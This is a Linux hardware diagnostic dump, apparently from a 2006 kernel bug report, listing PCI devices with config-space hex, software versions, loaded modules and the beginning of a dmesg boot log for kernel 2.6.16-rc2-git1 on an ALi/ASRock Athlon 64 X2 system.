Interrupts: 64bit+ Queue=0/1 Enable- Address: 00000000fee00000 Data: 0000 00: b9 10 95 16 07 00 10 00 00 00 00 06 00 00 00 00 10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00:01.0 PCI bridge: ALi Corporation: Unknown device 524b (prog-if 00 [Normal decode]) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, cache line size 10 Bus: primary=00, secondary=01, subordinate=01, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: ff200000-ff2fffff Prefetchable memory behind bridge: fff00000-000fffff BridgeCtl: Parity+ SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [48] Message Signalled Interrupts: 64bit+ Queue=0/1 Enable- Address: 00000000fee00000 Data: 0000 Capabilities: [58] #10 [0141] Capabilities: [7c] #08 [a800] Capabilities: [88] #08 [8825] 00: b9 10 4b 52 06 01 10 00 00 00 04 06 10 00 01 00 10: 00 00 00 00 00 00 00 00 00 01 01 00 f0 00 00 00 20: 20 ff 20 ff f0 ff 00 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 40 00 00 00 00 00 00 00 0a 01 03 00 00:02.0 PCI bridge: ALi Corporation: Unknown device 524c (prog-if 00 [Normal decode]) Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0, cache line size 10 Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 I/O behind bridge: 0000f000-00000fff Memory behind bridge: ff300000-ff3fffff Prefetchable memory behind bridge: fff00000-000fffff BridgeCtl: Parity+ SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [48] Message Signalled Interrupts: 64bit+ Queue=0/1 Enable- Address: 00000000fee00000 Data: 0000 Capabilities: [58] #10 [0141] Capabilities: [7c] #08 [a800] Capabilities: [88] #08 [8825] 00: b9 10 4c 52 06 01 10 00 00 00 04 06 10 00 01 00 10: 00 00 00 00 00 00 00 00 00 02 02 00 f0 00 00 00 20: 30 ff 30 ff f0 ff 00 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 40 00 00 00 00 00 00 00 0b 01 03 00 00:04.0 Host bridge: ALi Corporation M1689 K8 Northbridge [Super K8 Single Chip] Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Region 0: Memory at dc000000 (32-bit, prefetchable) [size=64M] Capabilities: [40] #08 [0024] Capabilities: [60] #08 [8038] Capabilities: [80] AGP version 3.0 Status: RQ=28 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW- AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; 00: b9 10 89 16 06 01 10 00 00 00 00 06 00 00 00 00 10: 08 00 00 dc 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00:05.0 PCI bridge: ALi Corporation AGP8X Controller (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=03, subordinate=03, sec-latency=64 I/O behind bridge: 0000f000-00000fff Memory behind bridge: ff400000-ff4fffff Prefetchable memory behind bridge: c7f00000-d7efffff BridgeCtl: Parity+ SERR+ NoISA- VGA+ MAbort- &gt;Reset- FastB2B- 00: b9 10 46 52 07 01 20 00 00 00 04 06 00 00 01 00 10: 00 00 00 00 00 00 00 00 00 03 03 40 f0 00 20 22 20: 40 ff 40 ff f0 c7 e0 d7 00 00 00 00 00 00 00 00 30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00:06.0 PCI bridge: ALi Corporation M5249 HTT to PCI Bridge (prog-if 01 [Subtractive decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Bus: primary=00, secondary=04, subordinate=04, sec-latency=32 I/O behind bridge: 0000d000-0000dfff Memory behind bridge: ff500000-ff5fffff Prefetchable memory behind bridge: 88000000-880fffff BridgeCtl: Parity+ SERR+ NoISA- VGA- MAbort- &gt;Reset- FastB2B- 00: b9 10 49 52 07 01 00 00 00 01 04 06 00 00 01 00 10: 00 00 00 00 00 00 00 00 00 04 04 20 d0 d0 00 22 20: 50 ff 50 ff 00 88 00 88 00 00 00 00 00 00 00 00 30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00:07.0 ISA bridge: ALi Corporation M1563 HyperTransport South Bridge (rev 70) Subsystem: ASRock Incorporation: Unknown device 1563 Control: I/O+ Mem+ BusMaster+ SpecCycle+ MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 (250ns min, 6000ns max) 00: b9 10 63 15 0f 00 00 02 70 00 01 06 00 00 80 00 10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 49 18 63 15 30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 18 00:07.1 Bridge: ALi Corporation M7101 Power Management Controller [PMU] Subsystem: ASRock Incorporation: Unknown device 7101 Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00: b9 10 01 71 00 00 00 02 00 00 80 06 00 00 80 00 10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 49 18 01 71 30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:11.0 Ethernet controller: ALi Corporation M5263 Ethernet Controller (rev 40) Subsystem: ASRock Incorporation: Unknown device 5263 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (5000ns min, 10000ns max), cache line size 08 Interrupt: pin A routed to IRQ 10 Region 0: I/O ports at e800 [size=256] Region 1: Memory at ff6ffc00 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00: b9 10 63 52 07 01 10 02 40 00 00 02 08 20 00 00 10: 01 e8 00 00 00 fc 6f ff 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 49 18 63 52 30: 00 00 00 00 50 00 00 00 00 00 00 00 0a 01 14 28 00:12.0 IDE interface: ALi Corporation M5229 IDE (rev c7) (prog-if 8a [Master SecP PriP]) Subsystem: ASRock Incorporation: Unknown device 5229 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Interrupt: pin A routed to IRQ 0 Region 0: I/O ports at &lt;ignored&gt; Region 1: I/O ports at &lt;ignored&gt; Region 2: I/O ports at &lt;ignored&gt; Region 3: I/O ports at &lt;ignored&gt; Region 4: I/O ports at ff00 [size=16] 00: b9 10 29 52 05 00 a0 02 c7 8a 01 01 00 20 00 00 10: f1 01 00 00 f5 03 00 00 71 01 00 00 75 03 00 00 20: 01 ff 00 00 00 00 00 00 00 00 00 00 49 18 29 52 30: 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00:13.0 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) (prog-if 10 [OHCI]) Subsystem: ASRock Incorporation: Unknown device 5237 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (20000ns max), cache line size 10 Interrupt: pin A routed to IRQ 11 Region 0: Memory at ff6fe000 (32-bit, non-prefetchable) [size=4K] 00: b9 10 37 52 17 01 a8 02 03 10 03 0c 10 20 80 00 10: 00 e0 6f ff 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 49 18 37 52 30: 00 00 00 00 00 00 00 00 00 00 00 00 0b 01 00 50 00:13.1 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) (prog-if 10 [OHCI]) Subsystem: ASRock Incorporation: Unknown device 5237 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (20000ns max), cache line size 10 Interrupt: pin B routed to IRQ 3 Region 0: Memory at ff6fd000 (32-bit, non-prefetchable) [size=4K] 00: b9 10 37 52 17 01 a8 02 03 10 03 0c 10 20 80 00 10: 00 d0 6f ff 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 49 18 37 52 30: 00 00 00 00 00 00 00 00 00 00 00 00 03 02 00 50 00:13.2 USB Controller: ALi Corporation USB 1.1 Controller (rev 03) (prog-if 10 [OHCI]) Subsystem: ASRock Incorporation: Unknown device 5237 Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap- 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (20000ns max), cache line size 10 Interrupt: pin C routed to IRQ 11 Region 0: Memory at ff6fc000 (32-bit, non-prefetchable) [size=4K] 00: b9 10 37 52 17 01 a8 02 03 10 03 0c 10 20 80 00 10: 00 c0 6f ff 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 49 18 37 52 30: 00 00 00 00 00 00 00 00 00 00 00 00 0b 03 00 50 00:13.3 USB Controller: ALi Corporation USB 2.0 Controller (rev 01) (prog-if 20 [EHCI]) Subsystem: ASRock Incorporation: Unknown device 5239 Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (4000ns min, 8000ns max), cache line size 10 Interrupt: pin D routed to IRQ 5 Region 0: Memory at ff6ff800 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] #0a [2090] 00: b9 10 39 52 16 01 b0 02 01 20 03 0c 10 20 80 00 10: 00 f8 6f ff 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 49 18 39 52 30: 00 00 00 00 50 00 00 00 00 00 00 00 05 04 10 20 00:18.0 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] HyperTransport Technology Configuration Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Capabilities: [80] #08 [2101] 00: 22 10 00 11 00 00 10 00 00 00 00 06 00 00 80 00 10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00:18.1 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Address Map Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00: 22 10 01 11 00 00 00 00 00 00 00 06 00 00 80 00 10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:18.2 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] DRAM Controller Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00: 22 10 02 11 00 00 00 00 00 00 00 06 00 00 80 00 10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00:18.3 Host bridge: Advanced Micro Devices [AMD] K8 [Athlon64/Opteron] Miscellaneous Control Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap- 66Mhz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- 00: 22 10 03 11 00 00 00 00 00 00 00 06 00 00 80 00 10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03:00.0 VGA compatible controller: Matrox Graphics, Inc. MGA Parhelia AGP (rev 03) (prog-if 00 [VGA]) Subsystem: Matrox Graphics, Inc. Parhelia 128Mb Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (4000ns min, 8000ns max), cache line size 10 Interrupt: pin A routed to IRQ 5 Region 0: Memory at c8000000 (32-bit, prefetchable) [size=128M] Region 1: Memory at ff4fe000 (32-bit, non-prefetchable) [size=8K] Expansion ROM at ff4c0000 [disabled] [size=128K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI+ D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [f0] AGP version 2.0 Status: RQ=32 Iso- ArqSz=0 Cal=0 SBA+ ITACoh- GART64- HTrans- 64bit- FW+ AGP3- Rate=x1,x2,x4 Command: RQ=1 ArqSz=0 Cal=0 SBA- AGP- GART64- 64bit- FW- Rate=&lt;none&gt; 00: 2b 10 27 05 07 00 b0 02 03 00 00 03 10 20 00 00 10: 08 00 00 c8 00 e0 4f ff 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 2b 10 40 08 30: 00 00 4c ff dc 00 00 00 00 00 00 00 05 01 10 20 04:05.0 Multimedia audio controller: Creative Labs SB Live! EMU10k1 (rev 0a) Subsystem: Creative Labs SBLive! 5.1 eMicro 28028 Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (500ns min, 5000ns max) Interrupt: pin A routed to IRQ 20 Region 0: I/O ports at d880 [size=32] Capabilities: [dc] Power Management version 1 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00: 02 11 02 00 05 01 90 02 0a 00 01 04 00 20 80 00 10: 81 d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 02 11 67 80 30: 00 00 00 00 dc 00 00 00 00 00 00 00 0b 01 02 14 04:05.1 Input device controller: Creative Labs SB Live! MIDI/Game Port (rev 0a) Subsystem: Creative Labs Gameport Joystick Control: I/O+ Mem- BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 Region 0: I/O ports at dc00 [size=8] Capabilities: [dc] Power Management version 1 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00: 02 11 02 70 05 01 90 02 0a 00 80 09 00 20 80 00 10: 01 dc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 02 11 20 00 30: 00 00 00 00 dc 00 00 00 00 00 00 00 00 00 00 00 04:06.0 SCSI storage controller: Adaptec AIC-7892A U160/m (rev 02) Subsystem: Adaptec 29160N Ultra160 SCSI Controller Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (10000ns min, 6250ns max), cache line size 10 Interrupt: pin A routed to IRQ 19 BIST result: 00 Region 0: I/O ports at d400 [disabled] [size=256] Region 1: Memory at ff5ff000 (64-bit, non-prefetchable) [size=4K] Expansion ROM at 88000000 [disabled] [size=128K] Capabilities: [dc] Power Management version 2 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot-,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00: 05 90 80 00 16 01 b0 02 02 00 00 01 10 20 00 80 10: 01 d4 00 00 04 f0 5f ff 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 05 90 a0 62 30: 00 00 5c ff dc 00 00 00 00 00 00 00 03 01 28 19 04:07.0 Ethernet controller: VIA Technologies, Inc. VT6102 [Rhine-II] (rev 42) Subsystem: D-Link System Inc DFE-530TX rev B Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B- Status: Cap+ 66Mhz- UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 32 (750ns min, 2000ns max), cache line size 10 Interrupt: pin A routed to IRQ 18 Region 0: I/O ports at d000 [size=256] Region 1: Memory at ff5fec00 (32-bit, non-prefetchable) [size=256] Expansion ROM at 88020000 [disabled] [size=64K] Capabilities: [40] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+) Status: D0 PME-Enable- DSel=0 DScale=0 PME- 00: 06 11 65 30 17 01 10 02 42 00 00 02 10 20 00 00 10: 01 d0 00 00 00 ec 5f ff 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 86 11 01 14 30: 00 00 ff ff 40 00 00 00 00 00 00 00 02 01 03 08 Software Environment: -----[ scripts/ver_linux output ]----- If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux dragon 2.6.16-rc2-git1 #1 SMP PREEMPT Sat Feb 4 15:12:34 CET 2006 i686 unknown unknown GNU/Linux Gnu C 3.4.5 Gnu make 3.80 binutils 2.15.92.0.2 util-linux 2.12p mount 2.12p module-init-tools 3.1 e2fsprogs 1.38 reiserfsprogs 3.6.19 reiser4progs line quota-tools 3.12. PPP 2.4.4b1 nfs-utils 1.0.7 Linux C Library 2.3.6 Dynamic linker (ldd) 2.3.6 Linux C++ Library 6.0.3 Procps 3.2.5 Net-tools 1.60 Kbd 1.12 Sh-utils 5.2.1 udev 064 Modules Loaded snd_seq_oss snd_seq_midi_event snd_seq snd_pcm_oss snd_mixer_oss uhci_hcd usbcore snd_emu10k1 snd_rawmidi snd_ac97_codec snd_ac97_bus snd_pcm snd_seq_device snd_timer snd_page_alloc snd_util_mem snd_hwdep snd agpgart -----[ dmesg output including oopses ]----- Linux version 2.6.16-rc2-git1 (juhl@dragon) (gcc version 3.4.5) #1 SMP PREEMPT Sat Feb 4 15:12:34 CET 2006 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009f800 (usable) BIOS-e820: 000000000009f800 - 00000000000a0000 (reserved) BIOS-e820: 00000000000e8000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000007ffb0000 (usable) BIOS-e820: 000000007ffb0000 - 000000007ffc0000 (ACPI data) BIOS-e820: 000000007ffc0000 - 000000007fff0000 (ACPI NVS) BIOS-e820: 000000007fff0000 - 0000000080000000 (reserved) BIOS-e820: 00000000ff7c0000 - 0000000100000000 (reserved) 1151MB HIGHMEM available. 896MB LOWMEM available. found SMP MP-table at 000ff780 On node 0 totalpages: 524208 DMA zone: 4096 pages, LIFO batch:0 DMA32 zone: 0 pages, LIFO batch:0 Normal zone: 225280 pages, LIFO batch:31 HighMem zone: 294832 pages, LIFO batch:31 DMI 2.3 present. ACPI: RSDP (v000 ACPIAM ) @ 0x000f9bb0 ACPI: RSDT (v001 A M I OEMRSDT 0x12000506 MSFT 0x00000097) @ 0x7ffb0000 ACPI: FADT (v002 A M I OEMFACP 0x12000506 MSFT 0x00000097) @ 0x7ffb0200 ACPI: MADT (v001 A M I OEMAPIC 0x12000506 MSFT 0x00000097) @ 0x7ffb0390 ACPI: OEMB (v001 A M I AMI_OEM 0x12000506 MSFT 0x00000097) @ 0x7ffc0040 ACPI: DSDT (v001 939M2 939M2150 0x00000150 INTL 0x02002026) @ 0x00000000 ACPI: PM-Timer IO Port: 0x808 ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] enabled) Processor #0 15:3 APIC version 16 ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled) Processor #1 15:3 APIC version 16 ACPI: IOAPIC (id[0x02] address[0xfec00000] gsi_base[0]) IOAPIC[0]: apic_id 2, version 17, address 0xfec00000, GSI 0-23 ACPI: IOAPIC (id[0x03] address[0xfec10000] gsi_base[24]) IOAPIC[1]: apic_id 3, version 17, address 0xfec10000, GSI 24-39 ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 low level) ACPI: IRQ0 used by override. ACPI: IRQ2 used by override. ACPI: IRQ9 used by override. Enabling APIC mode: Flat. Using 2 I/O APICs Using ACPI (MADT) for SMP configuration information Allocating PCI resources starting at 88000000 (gap: 80000000:7f7c0000) Built 1 zonelists Kernel command line: BOOT_IMAGE=2.6.16-rc2-git1 ro root=801 mapped APIC to ffffd000 (fee00000) mapped IOAPIC to ffffc000 (fec00000) mapped IOAPIC to ffffb000 (fec10000) Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Initializing CPU#0 CPU 0 irqstacks, hard=c03ed000 soft=c03eb000 PID hash table entries: 4096 (order: 12, 65536 bytes) Detected 2200.644 MHz processor. Using pmtmr for high-res timesource Console: colour dummy device 80x25 Dentry cache hash table entries: 131072 (order: 7, 524288 bytes) Inode-cache hash table entries: 65536 (order: 6, 262144 bytes) Memory: 2074004k/2096832k available (2059k kernel code, 21700k reserved, 693k data, 208k init, 1179328k highmem) Checking if this processor honours the WP bit even in supervisor mode... Ok. Calibrating delay using timer specific routine.. 4404.96 BogoMIPS (lpj=2202483) Mount-cache hash table entries: 512 CPU: After generic identify, caps: 178bfbff e3d3fbff 00000000 00000000 00000001 00000000 00000003 CPU: After vendor identify, caps: 178bfbff e3d3fbff 00000000 00000000 00000001 00000000 00000003 CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) CPU: L2 Cache: 1024K (64 bytes/line) CPU 0(2) -&gt; Core 0 CPU: After all inits, caps: 178bfbf7 e3d3fbff 00000000 00000010 00000001 00000000 00000003 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. Checking 'hlt' instruction... OK. CPU0: AMD Athlon(tm) 64 X2 Dual Core Processor 4400+ stepping 02 Booting processor 1/1 eip 2000 CPU 1 irqstacks, hard=c03ee000 soft=c03ec000 Initializing CPU#1 Calibrating delay using timer specific routine.. 4399.57 BogoMIPS (lpj=2199788) CPU: After generic identify, caps: 178bfbff e3d3fbff 00000000 00000000 00000001 00000000 00000003 CPU: After vendor identify, caps: 178bfbff e3d3fbff 00000000 00000000 00000001 00000000 00000003 CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) CPU: L2 Cache: 1024K (64 bytes/line) CPU 1(2) -&gt; Core 1 CPU: After all inits, caps: 178bfbf7 e3d3fbff 00000000 00000010 00000001 00000000 00000003 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#1. CPU1: AMD Athlon(tm) 64 X2 Dual Core Processor 4400+ stepping 02 Total of 2 processors activated (8804.54 BogoMIPS). ENABLING IO-APIC IRQs ..TIMER: vector=0x31 apic1=0 pin1=2 apic2=-1 pin2=-1 checking TSC synchronization across 2 CPUs: CPU#0 had 0 usecs TSC skew, fixed it up. CPU#1 had 0 usecs TSC skew, fixed it up. Brought up 2 CPUs migration_cost=1000 NET: Registered protocol family 16 ACPI: bus type pci registered PCI: PCI BIOS revision 3.00 entry at 0xf0031, last bus=4 PCI: Using configuration type 1 ACPI: Subsystem revision 20060127 ACPI: Interpreter enabled ACPI: Using IOAPIC for interrupt routing ACPI: PCI Root Bridge [PCI0] (0000:00) PCI: Probing PCI hardware (bus 00) PCI quirk: region 0800-083f claimed by ali7101 ACPI Boot video device is 0000:03:00.0 PCI: Transparent bridge - 0000:00:06.0 ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P0P4._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.HTT_._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PEB1._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PEB2._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 *5 6 7 10 11 12 14 15) ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 7 *10 11 12 14 15) ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 6 7 *10 11 12 14 15), disabled. ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 *10 11 12 14 15), disabled. ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 6 7 10 *11 12 14 15) ACPI: PCI Interrupt Link [LNKF] (IRQs *3 4 5 6 7 10 11 12 14 15) ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 6 7 10 *11 12 14 15) ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 5 6 7 10 11 12 14 15) *9 ACPI: PCI Interrupt Link [LNKP] 